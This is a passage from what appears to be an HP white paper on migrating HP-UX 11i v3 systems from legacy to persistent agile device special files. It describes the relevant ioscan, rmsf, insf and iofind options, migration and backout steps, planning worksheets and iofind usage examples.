Another new command, io_redirect_dsf, allows users to change the association of a persistent DSF from device A to device B without a reboot and without the need to change any application configuration information. After the operation, applications using the DSF of device A can transparently access device B. This command only accepts persistent DSFs or LUN hardware paths.
Example:
Disk A with DSF /dev/disk/disk1 becomes non-operational. Users may want to direct any further I/O access from disk A to disk B (with DSF /dev/disk/disk5, which is already in the system) without rebooting and/or changing application configuration.
For more information, see io_redirect_dsf(1M).
iobind
Another new HP-UX 11i v3 command is iobind. It performs online binding of a driver to a device. The driver must, however, support online binding. One of the arguments to this new command is a LUN hardware path. Since a persistent DSF is mapped to a LUN hardware path, users can easily find the required hardware path from the persistent DSF by using the `ioscan -m lun [dsf_name]` command.
For more information, see iobind(1M).
Enhanced Commands
New command line options have been added to some I/O commands to allow users to manage their system in the agile view.
### ioscan
The ioscan command has been enhanced to work with the agile view of the I/O system. Certain options are only applicable to this view:
- `ioscan -N [other options]`: Display output in the agile view.
- `ioscan -b -M driver_name -H hw_path`: The `-b` option specifies deferred binding of a driver to the given hardware path. The input parameter hw_path must be the LUN hardware path in the agile view.
- `ioscan -m keyword [parameters]`: This option shows mapping information between paths and/or devices. The `-m` option takes one of these keywords: lun, dsf, or hwpath. Parameters to the lun keyword must be in the agile view; parameters to the dsf and hwpath keywords can be from either the legacy or agile view.
- `ioscan -P keyword [-H hw_path]`: This option displays the properties of system hardware. The `-P` option takes one of the keywords (such as `health`, `instance`, and so on); for a complete list, see the `-P` option in `ioscan(1M)`. The `hw_path` parameter is from the agile view and the display uses the agile view as well.
- `ioscan -r -H hw_path`: The `-r` option removes a deferred driver binding. Input parameter must be in the agile view.
For more information, see `ioscan(1M)`.
### rmsf
This command accepts either legacy or persistent DSF. It has a new option, `-L`, to disable the legacy naming model and remove legacy DSFs on the system.
### insf
This command creates both legacy and persistent DSFs. It also has a new option, `-L`, to re-enable the legacy naming model and recreate legacy DSFs on the system. The combination of the `-Lv` options reports whether the legacy naming model is enabled on the system.
### lssf
This command accepts both legacy and persistent DSFs.
### mksf
This command creates either legacy or persistent DSFs.
---
## Read before Migrating to HP-UX 11i v3
Before migrating to HP-UX 11i v3, HP recommends that users become familiar with the following documentation:
- For an overview of the mass storage changes and a list of enhanced I/O commands available in HP-UX 11i v3, see The Next Generation Mass Storage Stack HP-UX 11i v3 white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
- For an overview of the migration from HP-UX 11iv2 to 11iv3 with emphasis on mass storage, see the Mass Storage Stack Update Guide white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
- For an overview of LVM migration from legacy to agile naming model, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at [http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager](http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager)
See also at the same location:
- LVM New Features in HP-UX 11i v3 white paper
- HP-UX System Administrator’s Guide: Logical Volume Management
Other useful links:
Agile Naming Support
This section discusses limitations to agile naming support (that is, the use of persistent DSFs) at the introduction of HP-UX 11i v3, as well as backward compatibility and backward compatibility exceptions.
Subsystems with No Persistent DSF Support at HP-UX 11i v3 Introduction
The subsystems listed below do not currently support the use of persistent DSFs. Use of persistent DSFs may require, as detailed below, that users replace an existing subsystem with a different one, or that they use a later version of that subsystem, which may not be available at HP-UX 11i v3 introduction. HP recommends that users check the following web sites or in the Read before Migrating to HP-UX 11i v3 section for the latest information on possible replacement products and on newer subsystems versions that would support the use of persistent DSFs.
The following subsystems and applications do not support persistent DSFs at the first release of HP-UX 11i v3:
- **HP Openview Storage Data Protector 6.0**: Support of persistent DSFs is provided in patch PHSS_36400.
- **HP Openview Storage Data Protector 5.5**: Openview Storage Data Protector 5.5 servers are not supported in HP-UX 11i v3. Openview Storage Data Protector 5.5 clients support legacy DSFs only. Users must migrate to DP 6.0 (or later version) to get support for persistent DSFs with the HP Openview Storage Data Protector software.
- **HP Storage Works Command View SDM**: supports legacy DSFs only.
- **Library & Tape Tools**: version 4.2 SR1 is required for support in HP-UX 11i v3 with both legacy and persistent DSFs.
- **Storage System Scripting Utility (SSSU)**: Version 6.0 and lower does not support persistent DSFs. Version 6.0.2 or later is required for persistent DSF support.
- **dvd+rw tools** (commands like `growisofs` or `dvd+rw-format`) operate properly with legacy DSFs only.
- **vPars** does not support creation or modification of virtual partitions using the agile view. But you can use persistent DSFs on the partition after the partition has been created. For more information on vPars, see [http://docs.hp.com/en/vse.html#vPars](http://docs.hp.com/en/vse.html#vPars).
- **VERITAS Volume Manager (VxVM) 4.1**: supports legacy DSFs only. Persistent DSFs are supported in VxVM 5.0. For more information, see [http://docs.hp.com/en/oshpux11iv3.html#VxVM](http://docs.hp.com/en/oshpux11iv3.html#VxVM) and the Migration from Legacy to Agile Naming Model in VxVM 5.0 on HP-UX 11i v3 white paper at: [http://docs.hp.com/en/5992-4212/5992-4212.pdf](http://docs.hp.com/en/5992-4212/5992-4212.pdf).
- **Third-party applications** related to mass storage: Users must check with the vendors whether the applications are impacted by the persistent DSFs and if they are, whether it is possible to use them with persistent DSFs.
**NOTE:** If you use any applications that do not support agile naming, be aware that a full migration (removing the legacy view with the `rmsf -L` command) might not be possible. See the Disable Legacy DSFs section.
Subsystems Requiring the Legacy View at HP-UX 11i v3 Introduction
The following application requires the legacy view to not be removed at the first release of HP-UX 11i v3:
- **Ignite-UX**: If you create an Ignite-UX image of your system and later remove the legacy view with the `rmsf -L` command, you cannot restore your system with the image.
**NOTE:** If you use any applications that do not support agile naming or that require you not to remove the legacy view, be aware that a full migration (removing the legacy view with the `rmsf -L` command) might not be possible. See the Disable Legacy DSFs section.
Backward Compatibility
Legacy DSF support is maintained in HP-UX 11i v3 to retain backward compatibility. HP-UX commands and utilities have been enhanced to manage subsystems in both legacy and agile views. By default those commands behave the same way in HP-UX 11i v3 as on prior HP-UX releases. For instance, the output of most commands is the same in HP-UX 11i v2 and in HP-UX 11i v3 (for options supported on both releases). See the Backward Compatibility Exceptions section for the list of exceptions.
Note that some commands display either agile view or legacy view depending on which view was used during their configuration. For these commands, if the agile view was used to configure some devices, the commands will display these devices in the agile view. For example, the LVM commands may display persistent DSFs, legacy DSFs, or a mix of both, depending on which DSFs were used when the LVM configuration was created.
Fully Backward Compatible Commands and Utilities
Most commands are fully backward compatible, meaning that in the legacy view, they behave the same way as they did on releases prior to HP-UX 11i v3. Here are examples of such commands:
- **ioscan(1M)** - Specify the `-N` option as necessary to manage the agile view. Without the `-N` option, output appears the same as in HP-UX 11i v2 if using options supported on both releases (for example, `ioscan -kfn` will still show legacy hardware paths and legacy DSFs).
- **rmsf(1M), insf(1M), lssf(1M), mksf(1M)** - Accept legacy and persistent DSFs and hardware paths as input.
- **savecrash(1M)** - Accepts both legacy and persistent DSFs as input.
- **swapon(1M)** - Accepts both legacy and persistent DSFs as input.
- **swapinfo(1M)** - Displays either persistent or legacy DSF, depending on what was configured.
- **STM** - Provides a menu option to display in legacy or agile view.
- **System Management Homepage (SMH)** - Provides a toggle to allow users to display in legacy or agile view.
- **LVM commands** - Accept both legacy and persistent DSFs as input. New options have been introduced to allow a choice between legacy DSFs and persistent DSFs. For example, the `-N` option has been added to the `vgscan` command to perform `/etc/lvmtab` recovery using persistent DSFs. Without the `-N` option, `vgscan` behaves as in HP-UX 11i v2, using legacy DSFs. See the LVM documentation mentioned in Read before Migrating to HP-UX 11i v3.
Backward Compatibility Exceptions
The following commands and utilities behave differently in HP-UX 11i v3 than in previous HP-UX releases:
- **The crashconf command** accepts persistent DSFs as input. For backward compatibility, it accepts legacy DSFs, but it converts them to persistent DSFs, and its output is displayed in the agile view only (persistent DSFs are displayed with option `-v` and lunpath hardware paths are displayed with the option `-i`). For more information, see `crashconf(1M)`.
- **The setboot command** accepts persistent DSFs as input as well as lunpath hardware paths, or legacy hardware paths, but it selects and stores in stable storage the lunpath hardware path to the device, and subsequently it only displays output in the agile view (persistent DSFs and lunpath hardware paths), regardless of whether a legacy hardware path was passed as input. For more information, see `setboot(1M)`.
- **Ignite-UX** operates in the agile view. It displays lunpath hardware paths for the location of the target install media in the root disk selection screen. The mapping of lunpath hardware paths to legacy
Migrating to the Agile Naming Model
When HP-UX 11i v3 is installed, both legacy and persistent DSFs are created on the system. Both types of DSFs can coexist and may be used simultaneously to access mass storage devices. However, only the use of persistent DSFs allows users to get the full benefits of the agile naming model. Therefore, HP recommends that users migrate applications using legacy DSFs and hardware paths to the agile naming model.
This section defines the steps to migrate from using legacy DSFs to using persistent DSFs. In most cases, user applications perform I/O through DSFs. In rare cases, they may reference hardware paths. Hardware paths apply to various types of elements, such as cell, HBA, and device. If users have applications that reference such hardware paths for devices beyond a mass storage HBA (legacy hardware paths), these hardware paths must be migrated to the lunpath hardware paths as well.
Migrating legacy DSFs to persistent DSFs involves both preparation steps and migration steps.
Preparation
Preparation steps include identifying the applications and files that need to be migrated and saving original copies of those files in case you need to back out the migration. To help with the identification, here are the main changes that could affect an application:
- New DSF names and hardware path formats (see Formats of DSFs and Hardware Paths for Mass Storage Devices)
- New DSF location (for instance, moved from /dev/[r]dsk to /dev/[r]disk)
- New command options to retrieve DSF names and hardware paths (for instance, the `-N` option added to ioscan)
- Decoding of DSF names and dev_ts is different as they no longer encode HBA/target/lun information
If you have written your own applications, look for the impacts above in the code.
Migration
Migration steps include making the actual modifications to the applications and files, testing the modified applications, and finally disabling the legacy naming model, which removes the legacy DSFs. If the modified applications run into issues, it might be necessary to back out the migration, that is, return to using legacy DSFs (see the Backing Out From Migration section). The steps for migrating legacy DSFs to persistent DSFs are as follows:
Make an IUX Recovery Tape
Objective: Ensure the system can be recovered to the current state
Back up the system to a recovery tape. See the section “Backing Up Your System” in the Ignite-UX Administration Guide available at http://www.hp.com/go/sw-deployment-docs. Click on HP-UX Ignite-UX and scroll down to the User guide section.
Identify System Configuration Files That Use Legacy DSFs/Hardware Paths
This section discusses HP-UX subsystems that may be configured in a user's system. A system can be configured with LVM, VxVM, or whole disk (neither LVM nor VxVM).
- **LVM is configured**
The LVM configuration is maintained in the binary file `/etc/lvmtab` and optionally the ASCII file `/etc/lvmpvg`, which may contain legacy DSFs, persistent DSFs, or a mix of both. LVM provides the `/usr/contrib/bin/vgdsf` tool for migrating the LVM configuration from legacy DSFs to persistent DSFs. For activated volume groups, the `vgdisplay` command with the `-v` option displays which DSFs a volume group is using. However, users must migrate all LVM volume groups, not only the activated ones. For more information, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at [http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager](http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager) for LVM migration details.
**Note:** Be sure to migrate the `/etc/lvmpvg` ASCII file using the `vgdsf` tool and not using the `iofind` tool as `vgdsf` takes other actions required for proper LVM migration.
For an LVM boot disk, run the `lvlnboot` command with the `-v` option to see whether LVM is using legacy DSFs or persistent DSFs for boot, swap, or dump. If LVM is using legacy DSFs for boot, swap, or dump, users must
- run the `/usr/contrib/bin/vgdsf -c vg_name` command to migrate the LVM configuration for the root volume group `vg_name` from legacy DSFs to persistent DSFs
- run the `lvlnboot -R /dev/vg_name` command to migrate the LVM on-disk boot information to match `/etc/lvmtab`.
See the LVM documentation in the Read before Migrating to HP-UX 11i v3 section for more details.
- **VxVM is configured**
Agile view is not supported with VxVM 4.1. Therefore users cannot migrate to persistent DSFs if they use VxVM 4.1. VxVM 5.0 provides support for the agile view.
- **Whole disk configuration is used (neither LVM nor VxVM)**
For whole disk configurations, typically a single boot disk has been configured for boot, swap, and dump using either a legacy DSF or a persistent DSF. If a system is updated from HP-UX 11i v2 to HP-UX 11i v3, the update process migrates the legacy configuration to the agile view.
Users can verify the configuration by using the `bdf` command to check the file system configuration, the `setboot` command to check the boot path, the `crashconf` command to check the dump device, and the `swapinfo` command to check the swap device. The `setboot` and `crashconf` commands automatically convert the configured DSFs into agile view. If `swapinfo` displays any configured legacy DSFs, use the `swapon` command to perform the migration.
The `/etc/fstab` and `/stand/system` files contain information about the file system and other system configuration. Swap and dump devices may be configured in `/etc/fstab` and `/stand/system`. If these two files contain legacy DSFs or legacy hardware paths, migrate them to persistent DSFs or lunpath hardware paths either manually or by using the `iofind` tool described below. Make sure to backup the files first before making any changes. Note that modifications to the `/etc/fstab` and `/stand/system` files may require a reboot to take effect. For more information, see `bdf(1M), crashconf(1M), setboot(1M), swapinfo(1M), swapon(1M), and fstab(4)`.
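A manual migration of such a file amounts to a backed-up search-and-replace. The sketch below works on a throwaway copy rather than the real `/etc/fstab`; the DSF names and the mapping between them are assumed for the example, and on a real system the mapping would come from `ioscan -m dsf`:

```shell
# Sketch of rewriting one legacy DSF in a copy of /etc/fstab.
fstab=./fstab.example
printf '/dev/dsk/c5t0d1 /data vxfs delaylog 0 2\n' > "$fstab"
cp "$fstab" "$fstab.bak"                                  # backout copy
sed 's|/dev/dsk/c5t0d1|/dev/disk/disk37|' "$fstab.bak" > "$fstab"
cat "$fstab"
# prints: /dev/disk/disk37 /data vxfs delaylog 0 2
```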
Execute the iofind command
Objective: Find instances of legacy DSFs and hardware paths in ASCII files on the system and help the user to convert them to the agile view.
The `iofind` command scans ASCII files in the system to identify those containing legacy DSFs and legacy hardware paths. The `-d` option specifies the directories in which to search. The `-i` option specifies the files to scan. To look for specific legacy information (DSFs or hardware paths), specify them in a file using the `-f` option. The default is to search all files and subdirectories under the current directory (where `iofind` is run) for all legacy DSFs and hardware paths configured. To speed up performance, some directories are excluded from the search using an exclusion list. Users can modify this exclusion list. If the search starts from the root directory and the file system is large, redirect the output to a file as the tool may take a long time to execute.
Other command options give users the flexibility to display the legacy information found in the files, replace them interactively with persistent DSFs and hardware paths from the agile view (`-R` option), replace them without user interaction (`-F` option), or only simulate the replacement (`-p` option). Before replacing the legacy information, the original files are backed up in the `/var/adm/iofind/logs/mmddyy_hhmmss/backup/` directory. HP recommends that users make note of the names of the modified files and the backup directory. To search every ASCII file in the system for all legacy DSFs and hardware paths known by the system (based on the `ioscan -kfn` output), run the `iofind` command from the root directory with only the `-Hn` options. If some files are found that contain legacy information, determine
- whether these files need to be modified, and
- whether additional migration steps are required by the applications referencing these files.
If there are additional migration steps required by the applications, follow their instructions. To migrate the files identified by `iofind`, run the `iofind` command again with the `-R` option.
If you think there might be unconfigured mass storage devices in the system, run `ioscan -fn` before executing `iofind`. This step ensures that all legacy DSFs and hardware paths have been configured and subsequently all legacy references to these devices will be found by the `iofind` command.
For more information, see `iofind(1M)`.
If the modified ASCII files are executable (such as shell scripts), test them to make sure that they still perform as expected. If the ASCII file is an input to an application, test the application as well.
See examples of using `iofind` in the Appendix.
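The search phase of `iofind` can be approximated with standard tools. The sketch below (the function name is hypothetical; GNU grep options are assumed for brevity, and `iofind` itself remains the supported tool) scans a directory tree for files mentioning any legacy DSF listed in a pattern file, one DSF per line, like the file passed to `iofind -f`:

```shell
# Rough stand-in for iofind's search phase (illustration only).
scan_legacy() {
    dir=$1 patterns=$2
    # -R: recurse, -I: skip binary files, -n: show line numbers,
    # -F: treat the patterns as fixed strings -- mirroring iofind's
    # "FileName:Line Number: Matching Pattern" report
    grep -RInF -f "$patterns" "$dir"
}
```

For example, `scan_legacy /opt /var/adm/mydsf` would list every line under `/opt` that mentions a DSF from `/var/adm/mydsf`.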
Recompile User Applications
There are two cases where legacy information may be referred to by a binary program:
- A binary program file reads an ASCII file as an input during run time.
- A source file has embedded legacy DSFs and/or hardware paths and is compiled into a binary application.
The `iofind` command will have replaced the legacy information for the first case. For case 2, if the source file is in the system where `iofind` is run, the (ASCII) source will have been updated with persistent data and the source must be recompiled. If the source file is not on the system where `iofind` executes, then the source file must be modified manually with the information from `ioscan` outputs as described above (see Mapping Commands), then recompiled. Backup the source files and binary before making the modifications and recompiling. Make notes of what changes are made to the source files. Test the modified applications to ensure successful execution.
Identify User Applications That Require DSFs or Hardware Paths as Input
There may be applications that need DSFs and/or hardware paths for mass storage devices as input. For example, a database application may require a user to type in a DSF. Identify such applications and map the legacy DSFs and hardware paths to persistent DSFs and lunpath hardware paths using the `ioscan` outputs as described above (see Mapping Commands). Test the applications. Make notes of what changes are needed and record the changes.
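When updating such applications, it helps to have the legacy-to-persistent mapping in a greppable form. The sketch below (the function name is hypothetical) turns saved `ioscan -m dsf` output into "legacy -> persistent" pairs; the layout assumed (persistent DSF in column 1, legacy DSF in column 2, continuation lines carrying only a legacy DSF) matches the worksheet examples later in this document:

```shell
# Sketch: derive legacy -> persistent DSF pairs from saved
# `ioscan -m dsf` output.
map_dsf() {
    awk 'NR > 1 && NF > 0 {
        if (NF == 2) persistent = $1   # line starts a new persistent DSF
        print $NF, "->", persistent    # last field is always a legacy DSF
    }' "$1"
}
```

For example, after `ioscan -m dsf > /tmp/dsf.map`, running `map_dsf /tmp/dsf.map` prints one mapping per legacy DSF.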
Save Other Configuration Files
In addition to saving the original files (found by `iofind` and other user applications) before migrating them, there is other information that needs to be saved for diagnostic purposes in case there are issues with migration. Save the following output to files before performing the last step in migration (Disable Legacy DSFs below):
Outputs of:
- `ioscan -kfnN`
- `ioscan -kfn`
- `ioscan -m dsf`
- `ioscan -m hwpath`
- `ll /dev/dsk`
- `ll /dev/rdsk`
- `ll /dev/rmt`
NOTE: Worksheets at the end of this document give examples on what information to save.
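The commands listed above can be captured with a small snapshot helper. This is an illustrative sketch, not part of the migration tooling; the function name and `/tmp/mysave` directory are examples (note that on HP-UX, `ll` is the customary alias for `ls -l`):

```shell
# Sketch: run each listed command and keep its output under one
# directory, numbered in order, so the configuration can be compared
# after migration.
snapshot() {
    savedir=$1; shift
    mkdir -p "$savedir"
    i=0
    for cmd in "$@"; do
        i=$((i + 1))
        # keep the output even if a command fails
        sh -c "$cmd" > "$savedir/cmd$i.out" 2>&1 || true
    done
}
```

For example: `snapshot /tmp/mysave 'ioscan -kfnN' 'ioscan -kfn' 'ioscan -m dsf' 'ioscan -m hwpath' 'ls -l /dev/dsk' 'ls -l /dev/rdsk' 'ls -l /dev/rmt'`.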
Disable Legacy DSFs
After users have made all the changes described in the steps above and checked that the migrated applications work using agile view, there are two ways to complete the migration:
1. Full migration
- Disable legacy naming model (will remove the legacy DSFs)
- Test applications with legacy naming model disabled
If all the migrated applications work as expected, the migration is complete.
2. Partial migration
If there are applications with limited support for persistent DSFs (such as the ones discussed above), there are two approaches that can be taken:
- Disable legacy naming model and test the applications that support running in the agile view to make sure that they are operating successfully with legacy naming model disabled. Then re-enable legacy naming model to be able to use those applications that need legacy naming model. This testing ensures that the applications that were migrated to agile view have been migrated successfully.
or
- If disabling the legacy naming model is not possible due to the application limitations, simply continue to operate with the legacy naming model enabled. However, since the legacy naming model is still enabled, it is not certain that applications have been migrated successfully to agile view.
Full Migration Details
To disable legacy DSFs, a new option (-L) has been added to rmsf to disable (remove) the legacy naming model. See the Appendix for an example of rmsf -L. After execution, all the legacy information (in the kernel and legacy DSFs under /dev directories) is removed. To reverse this step, see the Backing Out From Migration section.
Perform the following steps to do a full migration:
- Run rmsf -L. This command first performs a critical resource analysis. If some legacy DSFs are still open, the command fails. The insf -Lv command displays whether the legacy naming model is enabled or not.
NOTE: Automatic migration of dump devices occurs using Event Management (EVM) events when rmsf -L completes successfully.
- After this command has been successfully executed, access to mass storage devices via their legacy DSFs and paths will fail. Note also that ioscan will no longer display mass storage device information in the legacy view.
- Test the applications to make sure that they are running successfully. If everything works, migration is complete.
TIP: If there is any failure, the reason can be that an application is still trying to access a legacy DSF; check the syslog file for error messages related to opening of DSFs.
If there are any issues that users cannot correct, see the Backing Out From Migration section.
NOTE: On a system with multiple boot disks containing different OS versions, if an HP-UX 11i v3 system crashes with legacy naming model disabled and the next boot is on a pre-HP-UX 11i v3 (for instance, HP-UX 11i v2) system, savecrash cannot save the dump.
In this case, the boot otherwise succeeds, and the dump can still be saved manually, using the -D option to savecrash and specifying the appropriate device files.
Note: See the Appendix for examples of rmsf -L and insf -L.
Partial Migration Details
If some applications were modified to run in the agile view but a full migration is not possible because other applications with limitations (such as the ones discussed in the prior section) require the legacy naming model to be enabled, users can still validate the changes for the applications that were modified by disabling the legacy naming model using the steps below:
- Run the rmsf -L command to disable the legacy naming model and test the modified applications to ensure their successful execution as discussed previously under the Full Migration Details section.
- Run the insf -L command to re-enable the legacy naming model so that other applications that require legacy naming model can also operate properly. This command re-installs the legacy naming model and recreates the legacy DSFs as they were before. The ioscan command displays the legacy view again after this command is executed. Users can check whether legacy naming model is re-enabled by running insf -Lv.
Note: See the Appendix for examples of rmsf -L and insf -L.
Backing Out From Migration
This section discusses how to back out the changes made during the migration steps above in case there are any problems encountered during or after the migration. A new option (-L) to insf restores the legacy configuration back onto the system and recreates the legacy DSFs as they were before. The following are the steps to back out from a migration:
Step 1: Run insf -L. This command re-enables the legacy naming model and recreates the legacy DSFs as they were before.
Step 2: Restore the ASCII files modified by iofind from the /var/adm/iofind/logs/mmddyy_hhmmss/backup/ directory to their original directories.
Step 3: Restore the backup binary applications (if any).
Step 4: If LVM is used, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager for backing out LVM migration (the LVM commands are vgextend and vgreduce). If whole disk configuration is used and changes were made to /etc/fstab and /stand/system, restore the original /etc/fstab and /stand/system. A reboot might be required.
Step 5: Retry the original applications to verify that they are operating properly again. The original applications work as before if everything has been restored as it was before. If this is the case, the back out is successful. Otherwise, do recovery in Step 6.
Step 6: Restore the system from IUX Recovery Tape. (Perform this only if Step 5 fails)
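The file-restoration part of Step 2 can be sketched as follows. This is an illustration only (the function name is hypothetical): since the `iofind` backup tree mirrors the original paths, `.../backup/etc/fstab` restores to `/etc/fstab`. The destination root is a parameter so the sketch can be rehearsed safely outside `/`:

```shell
# Sketch: copy every file under an iofind backup tree back to its
# original location.
restore_backups() {
    backupdir=$1 destroot=${2:-/}
    ( cd "$backupdir" || exit 1
      find . -type f | while IFS= read -r f; do
          dest="$destroot/${f#./}"       # rebuild the original path
          mkdir -p "$(dirname "$dest")"
          cp -p "$f" "$dest"
      done )
}
```

For example: `restore_backups /var/adm/iofind/logs/mmddyy_hhmmss/backup` (with no second argument, files are restored under `/`).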
Conclusion
To take advantage of the benefits of the agile naming model, HP recommends users migrate their affected applications to use persistent DSFs. Users first need to understand the impact and define the changes to be made. Some restrictions might apply initially and may prevent a full migration, but the coexistence with the legacy naming model allows users to take a phased approach.
Planning Worksheets
This section lists sample worksheets (in table format) to identify, collect, document, and migrate legacy DSFs and hardware paths. If users have applications referencing legacy hardware paths, these paths need to be migrated as well. The lists document what needs to be changed and provide a record to recover from in case there are any problems with the migration.
These records are for illustration purposes only and the DSFs, hardware paths and file names listed are examples. Users would most likely save electronic copies of `ioscan` and other command output as well (per the migration steps above).
1. Mapping legacy to persistent DSF. The following table is derived from the output of `ioscan -m dsf`. This table is needed if there are any applications referencing legacy DSFs.
<table>
<thead>
<tr>
<th>Persistent DSF</th>
<th>Legacy DSF(s)</th>
</tr>
</thead>
<tbody>
<tr>
<td>/dev/rdisk/disk14</td>
<td>/dev/rdsk/c7t0d0<br>/dev/rdsk/c4t0d0</td>
</tr>
</tbody>
</table>
2. Mapping legacy hardware path to lunpath hardware path. The following table is derived from the output of `ioscan -m hwpath`. This table is only needed if there are any applications referencing legacy hardware paths.
<table>
<thead>
<tr>
<th>LUN Hardware path</th>
<th>Lunpath Hardware path</th>
<th>Legacy hardware path</th>
</tr>
</thead>
<tbody>
<tr>
<td>64000/0xfa00/0x6</td>
<td>0/1/0.0x0.0x0</td>
<td>0/1/0.0.0</td>
</tr>
</tbody>
</table>
3. List of ASCII files changed by the `iofind` command
<table>
<thead>
<tr>
<th>Files changed by `iofind`</th>
<th>Original files saved at:</th>
<th>What changed?</th>
</tr>
</thead>
<tbody>
<tr>
<td>/usr/adm/myconfig</td>
<td>/var/adm/iofind/logs/mmddyy_hhmmss/backup/usr/adm/myconfig</td>
<td>Line 5: From /dev/dsk/c8t1d0 To /dev/disk/disk6</td>
</tr>
<tr>
<td>/usr/adm/myperl.pl</td>
<td>/var/adm/iofind/logs/mmddyy_hhmmss/backup/usr/adm/myperl.pl</td>
<td>Line 20: From /dev/rdsk/c3t0d0 To /dev/disk/disk20</td>
</tr>
<tr>
<td>/etc/fstab</td>
<td>/var/adm/iofind/logs/mmddyy_hhmmss/backup/etc/fstab</td>
<td>Line 6: From /dev/dsk/c2t0d0s2 To /dev/disk/disk22_p2</td>
</tr>
</tbody>
</table>
4. List of other files changed (recompiled/migrated).
This list is to record any applications that need recompilation/migration.
<table>
<thead>
<tr>
<th>(Other) files changed</th>
<th>Original files saved at:</th>
<th>What was changed?</th>
</tr>
</thead>
<tbody>
<tr>
<td>/usr/contrib/myprogramA.c</td>
<td>/tmp/mysave/myprogramA.c</td>
<td>Line 15: From /dev/rdsk/c1t0d2 To /dev/rdisk/disk28</td>
</tr>
<tr>
<td>/usr/contrib/myprogramB.c</td>
<td>/tmp/mysave/myprogramB.c</td>
<td>Line 20: From 0/4/1/0.1.0 To 0/4/1/0.0x1.0x0</td>
</tr>
</tbody>
</table>
5. List of other applications that require manual legacy DSF/hardware path input during execution. This list contains names of any applications that require users to input legacy parameters, such as a database application which needs a user to enter legacy information.
<table>
<thead>
<tr>
<th>Name and directory of apps</th>
<th>Legacy information</th>
<th>Agile view information</th>
</tr>
</thead>
<tbody>
<tr>
<td>/usr/admin/mydatabase</td>
<td>/dev/dsk/c5t1d0</td>
<td>/dev/disk/disk25</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
6. List of subsystem configurations that reference legacy information. This list records subsystem settings (such as dump or swap devices) and their agile view replacements.
<table>
<thead>
<tr>
<th>Name of subsystem configuration</th>
<th>Legacy information</th>
<th>Agile view information</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dump</td>
<td>/dev/dsk/c9t2d0</td>
<td>/dev/disk/disk16</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
7. Location of other saved files
This list is for verification and recovery.
a. The ioscan output will help to determine what has changed in the system configuration.
b. The files in /dev/dsk/, /dev/rdsk/, and /dev/rmt directories represent the legacy DSFs.
**IMPORTANT:** Save these files before running `rmsf -L` because this command removes the legacy configuration from the system. The saved files will serve as a record.
<table>
<thead>
<tr>
<th>Files</th>
<th>Saved at</th>
</tr>
</thead>
<tbody>
<tr>
<td>Save the following before running "rmsf -L":</td>
<td>(For illustration purpose, the saved files are called "b4")</td>
</tr>
<tr>
<td>ioscan -m dsf > /tmp/mysave/ioscan.dsf.b4</td>
<td>/tmp/mysave/ioscan.dsf.b4</td>
</tr>
<tr>
<td>ioscan -kfnN > /tmp/mysave/ioscan.kfnN.b4</td>
<td>/tmp/mysave/ioscan.kfnN.b4</td>
</tr>
<tr>
<td>ioscan -kfn > /tmp/mysave/ioscan.kfn.b4</td>
<td>/tmp/mysave/ioscan.kfn.b4</td>
</tr>
<tr>
<td>ioscan -m hwpath > /tmp/mysave/ioscan.hwpath.b4</td>
<td>/tmp/mysave/ioscan.hwpath.b4</td>
</tr>
<tr>
<td>ll /dev/dsk > /tmp/mysave/dsk.b4</td>
<td>/tmp/mysave/dsk.b4</td>
</tr>
<tr>
<td>ll /dev/rdsk > /tmp/mysave/rdsk.b4</td>
<td>/tmp/mysave/rdsk.b4</td>
</tr>
<tr>
<td>ll /dev/rmt > /tmp/mysave/rmt.b4</td>
<td>/tmp/mysave/rmt.b4</td>
</tr>
</tbody>
</table>
Appendix
Examples of using iofind
Example 1 - Find files containing the DSF names (/dev/dsk/c0t0d0 and /dev/dsk/c2t0d0) starting at the directory /opt, and preview the replacement with persistent DSFs. This example assumes that there is a user file, /opt/myconfig, containing DSF /dev/dsk/c2t0d0.
A. Create a file /var/adm/mydsf containing two lines:
/dev/dsk/c0t0d0
/dev/dsk/c2t0d0
B. Run: iofind -n -f /var/adm/mydsf -d /opt -R -p
C. The utility displays files found and asks if you want to change the DSF name in all occurrences found. Since this is a preview, the changes are not done on the original file but put into a preview directory. The following is the output from the iofind command:
The following occurrences of /dev/dsk/c2t0d0 was found in file /opt/myconfig:
FileName:Line Number: Matching Pattern
____________________________________
/opt/myconfig:425:# my device name (e.g. /dev/dsk/c2t0d0)
Do you want iofind to replace /dev/dsk/c2t0d0 with /dev/disk/disk3 :(Y)Yes;(N)No;Q(Quit)
? Y
Replaced /dev/dsk/c2t0d0 with /dev/disk/disk3 in file /var/adm/iofind/logs/013007_142244/preview/opt/myconfig
D. Review the logging files under /var/adm/iofind/logs/mmddyy_hhmmss (the exact location is provided by the tool). You can view all the files with matching instances found.
When the tool is run the first time, the iofind command creates an exclusion list at /var/adm/iofind/cfg/iofind_exclude.cfg. This file includes directories that do not likely contain ASCII configuration files with legacy information. Searching files in these directories may slow down the tool execution.
Review the contents of this exclusion file to make sure that there is no file or directory that should be searched. If there is any, remove the file or directory name from the exclusion file and run iofind again.
Example 2 – Run the same command as above, but without the preview option. If you are satisfied with the preview results, you may run the tool again and go ahead with the real changes (do not specify -p for preview):
# iofind -n -f /var/adm/mydsf -d /opt -R
The following are output from the iofind command:
Matching instances will be displayed as follows:
The following occurrences of /dev/dsk/c2t0d0 was found in file /opt/myconfig:
FileName:Line Number: Matching Pattern
____________________________________
/opt/myconfig:425:# my device name (e.g. /dev/dsk/c2t0d0)
Do you want iofind to replace /dev/dsk/c2t0d0 with /dev/disk/disk3 :(Y)Yes;(N)No;Q(Quit)
? Y
Replaced /dev/dsk/c2t0d0 with /dev/disk/disk3 in file /opt/myconfig
This time, the “Y” answer makes the modification in the file. A backup is saved under
